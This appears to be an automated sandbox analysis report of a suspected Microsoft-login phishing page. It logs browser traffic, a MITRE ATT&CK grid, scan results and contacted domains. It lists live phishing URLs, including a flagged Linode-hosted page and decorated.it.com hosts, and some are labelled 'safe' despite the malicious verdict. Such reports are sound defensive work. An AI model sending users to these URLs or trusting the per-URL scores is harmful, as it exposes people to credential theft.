    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: unknownHTTPS traffic detected: 198.23.60.214:443 -> 192.168.2.17:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 198.23.60.214:443 -> 192.168.2.17:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 198.23.60.214:443 -> 192.168.2.17:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.17:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.72.132:443 -> 192.168.2.17:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.188.228:443 -> 192.168.2.17:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.69.4:443 -> 192.168.2.17:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.72.164:443 -> 192.168.2.17:49753 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.72.132:443 -> 192.168.2.17:49767 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.17:49774 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 198.23.60.214:443 -> 192.168.2.17:49775 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.17:49782 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.71:443 -> 192.168.2.17:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.234.86.83:443 -> 192.168.2.17:49826 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.234.86.83:443 -> 192.168.2.17:49825 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.17:49837 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49843 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.71:443 -> 192.168.2.17:49845 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.17:49849 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.17:49851 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.17:49853 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.17:49856 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49854 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.17:49863 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 43.129.45.113:443 -> 192.168.2.17:49860 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.6.156:443 -> 192.168.2.17:49872 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.151.6:443 -> 192.168.2.17:49878 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.17:49884 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49920 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.15.240.19:443 -> 192.168.2.17:49942 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.1.237.105:443 -> 192.168.2.17:49952 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.1.237.105:443 -> 192.168.2.17:49952 version: TLS 1.2
    Source: classification engineClassification label: mal72.phis.win@26/41@93/342
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1964,i,7820921529395472198,438887619423498183,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://colegiojuancalvino.com/cloud/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1964,i,7820921529395472198,438887619423498183,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    2
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting
    1
    Extra Window Memory Injection
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Extra Window Memory Injection
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://colegiojuancalvino.com/cloud/0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://colegiojuancalvino.com/cloud/js/27t732321122.js0%Avira URL Cloudsafe
    https://colegiojuancalvino.com/cloud/img/index.css0%Avira URL Cloudsafe
    https://colegiojuancalvino.com/cloud/js/captcha.js?cb=17456938850%Avira URL Cloudsafe
    https://colegiojuancalvino.com/cloud/img/styles.css0%Avira URL Cloudsafe
    https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB0%Avira URL Cloudsafe
    https://www.google.com/recaptcha/api2/userverify?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y0%Avira URL Cloudsafe
    https://www.google.com/recaptcha/api2/payload?p=06AFcWeA6URnwJUfsZxTj2ctYJaYM1sbGnxKFnkb8EmeoweNRzDFX9_0SbXeMDtj8fH3-bzrtpNPWQdd1QJwxg4Ji6QwJZdZIKlTTbLRv7PrmTQ9FCqr5Dqdr692tOiH_8mg2OFKXQWg8_BrqX5FVQ7TmsV9jyoBM8pUW2cvH7jfHxwTkT7KFo8O0l5g3797GkTuJq70ZLuGdAflKy87M2x0i_PsmWZPtUcw&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y0%Avira URL Cloudsafe
    https://colegiojuancalvino.com/favicon.ico0%Avira URL Cloudsafe
    https://www.google.com/recaptcha/api2/bframe?hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y0%Avira URL Cloudsafe
    https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y&co=aHR0cHM6Ly9jb2xlZ2lvanVhbmNhbHZpbm8uY29tOjQ0Mw..&hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpB&size=normal&cb=r86mefsrfvm20%Avira URL Cloudsafe
    https://www.google.com/recaptcha/api2/reload?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y0%Avira URL Cloudsafe
    https://colegiojuancalvino.com/cloud/img/pdf.png0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1763597922:1745691859:D1akmVg8CdFjyxqpVeXkJ8TpD4SsVkweaTwS2aTk9H8/93684fb0dbd897fd/9YvU04gQHGk8xVeVn96jjtZgGMlYAR5Sj8lOuIoKBJ4-1745693903-1.1.1.1-.VSh_U2EX6i2OnA2GC72oLuJZvgRjK51ta99XI2_MVrHeyRiMyhdJn2w9NEBEBb70%Avira URL Cloudsafe
    https://colegiojuancalvino.com/cloud/img/mp.png0%Avira URL Cloudsafe
    https://colegiojuancalvino.com/cloud/img/bag.png0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1r9bu/0x4AAAAAABT-Uw9lt5N3V6JZ/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=93684fb0dbd897fd&lang=auto0%Avira URL Cloudsafe
    https://www.google.com/recaptcha/api2/clr?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33y0%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/93684fb0dbd897fd/1745693905056/f09a011a7bbe498bc2ab4edbb553506fdcc358ef76a8ec6b1cd7b3acfd36f87f/A6cmbhPyJdX0Ot20%Avira URL Cloudsafe
    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/93684fb0dbd897fd/1745693905058/ARGetAMMqQ9QBdw0%Avira URL Cloudsafe
    https://office.com/login0%Avira URL Cloudsafe
    https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638812907206847860.MWIxMDY0ZTItYmM5Ni00M2IzLThiNDMtZGE1OWRhNzk0ZmMxYWI4ZWZjYzQtNTZmMi00MzgwLWExMDEtYTc0ZTI5ODdhY2Nk&ui_locales=en-US&mkt=en-US&client-request-id=ba651f70-bce4-4aca-8b42-40c53145ac1e&state=1H_7hRKg8dtxfQnszta-VybGdR61VaWOFYoMKJG2ttadv_xV4YsYERfKSJLV16kjzIBwbpfsg7lcX5yZntM87e-GQCDgtv-B87UINv_RxudT6r6uYPW99AgPHPKuBouE3K8lKqfSo5PbIOnwC8SZnyuA_TrMoONv3NyylCGl0b-JR814jaXSRqJba0a61YK6jKzreiFpdVhJC-SMB5eq68SCdpkq7425psvnOZ42j-qm8wU7Fsv9UFg6eQ6ckrNNr_u1rpdvDJZlODxnChErDQ&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.00%Avira URL Cloudsafe
    https://www.office.com/login0%Avira URL Cloudsafe
    https://5963053387-1317754460.cos.ap-jakarta.myqcloud.com/attach%2Fbootstrap.min.js0%Avira URL Cloudsafe
    https://gmddqjzslbcuxxqboemm.decorated.it.com/0%Avira URL Cloudsafe
    https://miog.decorated.it.com/google.php0%Avira URL Cloudsafe
    https://microcmg.jp-osa-1.linodeobjects.com/favicon.ico100%Avira URL Cloudphishing
    NameIPActiveMaliciousAntivirus DetectionReputation
    stackpath.bootstrapcdn.com
    104.18.11.207
    truefalse
      high
      beacons3.gvt2.com
      142.250.69.3
      truefalse
        high
        e329293.dscd.akamaiedge.net
        23.15.240.19
        truefalse
          high
          s-part-0041.t-0009.t-msedge.net
          13.107.246.69
          truefalse
            high
            beacons-handoff.gcp.gvt2.com
            142.250.112.94
            truefalse
              high
              gmddqjzslbcuxxqboemm.decorated.it.com
              104.21.80.1
              truefalse
                unknown
                maxcdn.bootstrapcdn.com
                104.18.11.207
                truefalse
                  high
                  b-0004.b-msedge.net
                  13.107.6.156
                  truefalse
                    high
                    colegiojuancalvino.com
                    198.23.60.214
                    truefalse
                      unknown
                      beacons2.gvt2.com
                      142.250.199.131
                      truefalse
                        high
                        www.tm.a.prd.aadg.akadns.net
                        20.190.151.6
                        truefalse
                          high
                          beacons.gvt2.com
                          142.250.176.3
                          truefalse
                            high
                            jp-osa-1.linodeobjects.com.akadns.net
                            172.234.86.83
                            truefalse
                              unknown
                              beacons6.gvt2.com
                              142.250.69.3
                              truefalse
                                high
                                miog.decorated.it.com
                                104.21.112.1
                                truefalse
                                  unknown
                                  code.jquery.com
                                  151.101.130.137
                                  truefalse
                                    high
                                    cdnjs.cloudflare.com
                                    104.17.24.14
                                    truefalse
                                      high
                                      challenges.cloudflare.com
                                      104.18.95.41
                                      truefalse
                                        high
                                        office.com
                                        13.107.6.156
                                        truefalse
                                          high
                                          www.google.com
                                          142.250.72.132
                                          truefalse
                                            high
                                            s-part-0043.t-0009.t-msedge.net
                                            13.107.246.71
                                            truefalse
                                              high
                                              cos.ap-jakarta.myqcloud.com
                                              43.129.45.113
                                              truefalse
                                                high
                                                www.office.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  microcmg.jp-osa-1.linodeobjects.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    aadcdn.msftauth.net
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      beacons.gcp.gvt2.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        5963053387-1317754460.cos.ap-jakarta.myqcloud.com
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          login.microsoftonline.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            NameMaliciousAntivirus DetectionReputation
                                                            https://otelrules.svc.static.microsoft/rules/rule701151v1s19.xmlfalse
                                                              high
                                                              https://otelrules.svc.static.microsoft/rules/rule702151v1s19.xmlfalse
                                                                high
                                                                https://otelrules.svc.static.microsoft/rules/rule120630v0s19.xmlfalse
                                                                  high
                                                                  https://otelrules.svc.static.microsoft/rules/rule120645v0s19.xmlfalse
                                                                    high
                                                                    https://otelrules.svc.static.microsoft/rules/rule120654v0s19.xmlfalse
                                                                      high
                                                                      https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                                        high
                                                                        https://colegiojuancalvino.com/cloud/img/pdf.pngtrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://otelrules.svc.static.microsoft/rules/rule120621v0s19.xmlfalse
                                                                          high
                                                                          https://otelrules.svc.static.microsoft/rules/rule120663v0s19.xmlfalse
                                                                            high
                                                                            https://otelrules.svc.static.microsoft/rules/rule120679v0s19.xmlfalse
                                                                              high
                                                                              https://otelrules.svc.static.microsoft/rules/rule702751v1s19.xmlfalse
                                                                                high
                                                                                https://otelrules.svc.static.microsoft/rules/rule702301v1s19.xmlfalse
                                                                                  high
                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=93684fb0dbd897fd&lang=autofalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://otelrules.svc.static.microsoft/rules/rule120609v0s19.xmlfalse
                                                                                    high
                                                                                    https://otelrules.svc.static.microsoft/rules/rule120636v0s19.xmlfalse
                                                                                      high
                                                                                      https://otelrules.svc.static.microsoft/rules/rule120627v0s19.xmlfalse
                                                                                        high
                                                                                        https://otelrules.svc.static.microsoft/rules/rule120618v0s19.xmlfalse
                                                                                          high
                                                                                          https://otelrules.svc.static.microsoft/rules/rule702550v1s19.xmlfalse
                                                                                            high
                                                                                            https://otelrules.svc.static.microsoft/rules/rule703400v0s19.xmlfalse
                                                                                              high
                                                                                              https://www.google.com/recaptcha/api2/payload?p=06AFcWeA6URnwJUfsZxTj2ctYJaYM1sbGnxKFnkb8EmeoweNRzDFX9_0SbXeMDtj8fH3-bzrtpNPWQdd1QJwxg4Ji6QwJZdZIKlTTbLRv7PrmTQ9FCqr5Dqdr692tOiH_8mg2OFKXQWg8_BrqX5FVQ7TmsV9jyoBM8pUW2cvH7jfHxwTkT7KFo8O0l5g3797GkTuJq70ZLuGdAflKy87M2x0i_PsmWZPtUcw&k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33yfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comtrue
                                                                                                unknown
                                                                                                https://otelrules.svc.static.microsoft/rules/rule700400v2s19.xmlfalse
                                                                                                  high
                                                                                                  https://www.google.com/recaptcha/api2/userverify?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33yfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/93684fb0dbd897fd/1745693905058/ARGetAMMqQ9QBdwfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120635v0s19.xmlfalse
                                                                                                    high
                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120612v0s19.xmlfalse
                                                                                                      high
                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120681v0s19.xmlfalse
                                                                                                        high
                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120640v0s19.xmlfalse
                                                                                                          high
                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120669v0s19.xmlfalse
                                                                                                            high
                                                                                                            https://www.google.com/recaptcha/api2/clr?k=6LcGrSQrAAAAAGRdF_5OKhQTy7DfZ0sTdR27o33yfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120628v0s19.xmlfalse
                                                                                                              high
                                                                                                              https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                                                                high
                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120682v0s19.xmlfalse
                                                                                                                  high
                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120617v0s19.xmlfalse
                                                                                                                    high
                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120611v0s19.xmlfalse
                                                                                                                      high
                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120646v0s19.xmlfalse
                                                                                                                        high
                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120664v0s19.xmlfalse
                                                                                                                          high
                                                                                                                          https://office.com/loginfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120674v0s19.xmlfalse
                                                                                                                            high
                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120677v0s19.xmlfalse
                                                                                                                              high
                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120619v0s19.xmlfalse
                                                                                                                                high
                                                                                                                                https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=ItfkQiGBlJDHuTkOhlT3zHpBfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120625v0s19.xmlfalse
                                                                                                                                  high
                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120622v0s19.xmlfalse
                                                                                                                                    high
                                                                                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1763597922:1745691859:D1akmVg8CdFjyxqpVeXkJ8TpD4SsVkweaTwS2aTk9H8/93684fb0dbd897fd/9YvU04gQHGk8xVeVn96jjtZgGMlYAR5Sj8lOuIoKBJ4-1745693903-1.1.1.1-.VSh_U2EX6i2OnA2GC72oLuJZvgRjK51ta99XI2_MVrHeyRiMyhdJn2w9NEBEBb7false
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120653v0s19.xmlfalse
                                                                                                                                      high
                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700401v2s19.xmlfalse
                                                                                                                                        high
                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120616v0s19.xmlfalse
                                                                                                                                          high
                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120631v0s19.xmlfalse
                                                                                                                                            high
                                                                                                                                            https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                                                                                                              high
                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120647v0s19.xmlfalse
                                                                                                                                                high
                                                                                                                                                https://colegiojuancalvino.com/cloud/img/mp.pngtrue
                                                                                                                                                • Avira URL Cloud: safe
